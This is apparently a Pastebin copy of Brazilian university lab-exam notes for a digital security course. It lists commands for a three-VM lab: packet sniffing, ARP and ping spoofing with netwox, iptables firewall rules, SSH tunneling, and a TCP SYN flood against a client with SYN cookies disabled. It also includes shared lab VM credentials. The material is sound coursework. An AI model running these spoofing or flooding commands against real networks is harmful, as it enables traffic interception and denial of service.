Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- ################ PROVA 3 - Segurança Digital na Prática
- ### Alunos: Lorena Marques Cerbino - 2013063088
- ### Lucas de Miranda Bastos - 2013017595
- ### Professor: Leonardo Barbosa
- ################
- # IP VM Cliente: 192.168.56.10
- # IP VM Server: 192.168.56.11
- # IP VM Observadora/Atacante: 192.168.56.12
- # Para Todas as VMs: user: digitalsec | password: digisec
- #Observação: Os comandos ssh e telnet precisam de usuário e senha após sua execução
- ######### Laboratório 1 - Sniff-then-Spoof #########
- ###### TASK 1 - Sniffing
- ### VM 1 Cliente
- telnet 192.168.56.11
- ssh 192.168.56.11
- ### VM 2 Server
- sudo service openbsd-inetd start
- sudo service ssh start
- ### VM 3 Atacante
- sudo wireshark
- ###### TASK 2 - Spoofing
- ### VM 1 Cliente
- ping 192.168.56.11
- ping 192.168.56.40
- ping 192.168.56.41
- ping 192.168.56.42
- ping 192.168.56.43
- ### VM 3 Atacante
- sudo netwox 73 -d enp0s8 -i "192.168.56/24" -e "08:00:27:cc:14:45" -ap
- sudo wireshark
- ###### TASK 3 - ARP and PING Spoofing
- ##Obs: o comando sudo ip -s -s neigh flush all limpa a tabela arp
- ### VM 1 Cliente
- sudo ip -s -s neigh flush all
- ping 192.168.56.11
- ### VM 3 Atacante
- sudo netwox 73 -d enp0s8 -i "192.168.56.11" -e "08:00:27:cc:14:3e" -ap
- sudo netwox 80 -e "08:00:27:cc:14:3e" -i "192.168.56.11" -d enp0s8 -E 08:00:27:ab:42:ac -I 192.168.56.10
- sudo wireshark
- ######### Laboratório 1 - Firewall #########
- ###### TASK 1 - Stateless Firewall
- ### VM 1 Cliente
- #Antes de ligar o firewall
- telnet 192.168.56.11
- #Depois de ligar o firewall
- telnet 192.168.56.11
- ### VM 2 Server
- sudo iptables -F
- telnet 192.168.56.10
- sudo iptables -A INPUT -p tcp -i enp0s8 --dport telnet -j REJECT
- sudo iptables -A OUTPUT -p tcp -o enp0s8 --dport telnet -j REJECT
- telnet 192.168.56.10
- ###### TASK 2 - Statefull Firewall
- ### VM 1 Cliente
- #Antes de ligar o firewall
- telnet 192.168.56.11
- #Depois de ligar o firewall
- telnet 192.168.56.11
- ### VM 2 Server
- sudo iptables -F
- telnet 192.168.56.10
- sudo iptables -A OUTPUT -p tcp -o enp0s8 --dport telnet -j REJECT
- telnet 192.168.56.10
- ###### TASK 3 - Tunneling
- ### VM 1 Cliente
- ssh 192.168.56.11
- telnet 192.168.56.11
- ### VM 2 Server
- # Mesmos comandos da VM2 da task 2
- sudo iptables -F
- telnet 192.168.56.10
- sudo iptables -A OUTPUT -p tcp -o enp0s8 --dport telnet -j REJECT
- telnet 192.168.56.10
- ######### Laboratório 3 - DoS #########
- ###### TASK 1 (No slide aparece como Task 2) - Smurf Attack
- ### VM 1 Cliente
- ### VM 2 Server
- ### VM 3 Atacante
- ###### TASK 2 (No slide aparece como Task 3) - TCP SYN Attack
- ### VM 1 Cliente
- # desativar o syncookies
- sudo sysctl -w net.ipv4.tcp_syncookies=0
- # ativar o syncookies
- sudo sysctl -w net.ipv4.tcp_syncookies=1
- ### VM 3 Atacante
- sudo netwox 76 -i 192.168.56.10 -p 23 -s best
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement